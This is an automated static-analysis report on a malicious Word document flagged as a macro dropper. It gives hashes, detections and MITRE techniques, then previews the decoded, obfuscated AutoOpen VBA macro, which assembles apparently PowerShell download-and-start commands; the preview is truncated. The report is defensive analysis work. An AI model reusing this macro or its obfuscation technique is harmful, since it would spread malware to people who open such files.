Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 062dc3e1065d2843…

MALICIOUS

Office (OLE)

354.0 KB Created: 2018-10-03 04:08:00 Authoring application: Microsoft Office Word First seen: 2018-10-09
MD5: 3fc2f22e0741426e69357afdd8b47b71 SHA-1: cd47ef8451e045c6c87840752a7b3b2baa4bedc6 SHA-256: 062dc3e1065d2843ec7ec25900ed2572e426dbcbad94365415dfa651d0d22617
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains a VBA macro with an AutoOpen function, which is a common technique for malicious Office documents. The macro uses Shell() and CreateObject() calls, and appears to construct and execute obfuscated PowerShell commands. This suggests the document is designed to download and execute a secondary payload, consistent with a dropper or downloader malware.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-7151905-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7151905-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 63005 bytes
SHA-256: 3e88cfac7c5544366c08c3003a31764c445de82acb41089724c3972cc40947a4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function kkerk()
MsgBox ""
End Function
Sub AutoOpen()
Const orrdmuu = True
Const kduelm = True
Const iiuiunf = False
Const rbiyu = True
Const inzctkfvi = True
Const iq_mlnzg = False

If 2143 <= 1217 Then
Const euirfws = True
Const tage = True
Const iauytu = False
Else
rvpiai = "$idvrck"
End If
Select Case 48 - 65
Case -17
gbzny = "whmxeuoiieqrrn50='Pol';"
rvpiai = aozxakqua99 + rvpiai + gbzny
End Select
Select Case "c_hfvrtiwe"
Case 15220
Const af_yzc = False
Case 3127
Const ibfxxc_l = False
Const eqreyqu = True
Case "c_hfvrtiwe"
rvpiai = ayeae + rvpiai + "$uvredayyjp_ulwyaz='ypa';$o_hga" + ctowpyy
End Select
Select Case 13 - 38
Case -25
rvpiai = ncena + rvpiai + "i_zlraqiouliuo='orma" + ubvjir
End Select
Const rh_lfut = False

Select Case 73 - 30
Case 43
fg_yaevdgm = rvpiai + fddma
Const iiye = False
Const ef_gsi = True
Const yueetjtp = True
fg_yaevdgm = fg_yaevdgm + "t ';$ycsbsfcdghdmokputmvmojfql" + oxryodge
Case wrank_aytha
Const zggzul = False
Const wvo_ycmqi = True
Const tnh_ynnxlq = True
End Select
Select Case 79 + 83
Case 162
tjbmmayft57 = fg_yaevdgm
tjbmmayft57 = tjbmmayft57 + "a76=').Dow';$wditaagoo_zyftoo_wdemho='s;Star"
Case 25611
Const giacc = False
End Select
If 6616 <= 11272 Then
e_eoenh = Environ("SystemRoot")
ElseIf 1413 >= 5227 Then
Const i_yrmwu = False
Const addqmxm = False
Const juuytj = False
Const yyaddai = False
Const gciqy = True
Const dfxdfi = False
Const igqmf = True
Else
Const ecka = False
Const sqshye_mzdb0 = True
Const rkce_ype = True
End If
Select Case 74 + 93
Case 167
iarrma = tjbmmayft57 + ewxmfvo
iarrma = asyiioea + iarrma + "t';$ekhuzzzpp" + jc_duthrzy
Case 13748
Const dhiogccf = True
Case argkqzoo
Const yhhob = True
End Select
Const i_ioi = True

Select Case "qiybnt"
Case xayfkhfu
Const lgpayh = True
Const zjakbkg = True
Case nohmhy
Const eduu = True
Case "qiybnt"
zdi_wupp = yidsuvdy00 + iarrma + uloxys_yu
Const piiuoph = True
itnyyajo35 = "_lwpxdaa_fcij"
Const eemcdi = False
zdi_wupp = zdi_wupp + itnyyajo35
End Select
Const owvyty = True

Select Case "ibbvylk"
Case 30661
Const ooyzvye = False
Case dr_gg
Const zvuyjti_h = False
Case "ibbvylk"
nxqwleyu3 = "piou_ulyb_x='%s;';$"
Const efvjqkqbgw = True
zdi_wupp = zdi_wupp + nxqwleyu3
End Select
Const bymdwqpty10 = True

Select Case "niwcrtiye"
Case "niwcrtiye"
uauy = "onsjfeqf_ot_bblln='le(';$eh"
Const vloecsvtkr = False
zdi_wupp = zdi_wupp + uauy + klzno
Case 31470
Const m_iqoa = False
Const hxfyuiu = True
Case jzmskdmaxnt
Const wgwheycs = True
Const zyao = False
End Select
Const iesmeo = True

If 607 >= -1100 Then
e_eoenh = e_eoenh + "\sy"
End If
Const o_igsgu9 = False

Select Case 42 - 96
Case -54
zdi_wupp = avgeezmiyu + zdi_wupp + "zlaih_usvvioarr='ex';$og" + y_ieoh
End Select
Const iaojckh = True

Select Case 11 + 13
Case 24
tooksqu = zdi_wupp
uair = "mxjukdlgtoaoby4='stem.'"
tooksqu = tooksqu + uair
End Select
Const y_sxi = True

If 54 * 47 = 2538 Then
yaayvyde = e_eoenh
Const ebejvy4 = False
fdpfmdz_aan = "stem3"
yaayvyde = yaayvyde + fdpfmdz_aan
End If
If 60 - 11 = 49 Then
pcwedt = pgozm + tooksqu
Const sjlbah = True
ieiappdfu = ";$efxks_euiuuoyu_e_kjdhowyzme='m"
pcwedt = vuukdm + pcwedt + ieiappdfu
Else
Const wehb = False
Const vnltkqpvu = True
Const yqah_e_x = False
End If
Const pohcf = False
Const vlnqocz = True

If 3871 < 1271 Then
Const looo = False
Const uzg_iyn = True
Const wbbnual = False
Const sie_igjg = True
ElseIf 5501 >= 6987 Then
Const yckuie = True
Const oiauqny = False
Const viqqk = True
Else
Dim wamstcvzj
wamstcvzj = "2\Wi"
yaayvyde = yaayvyde + wamstcvzj
End If
Const yyaeqkm = False

If 5212 > 7444 Then
Const ewfqpkl = True
... (truncated)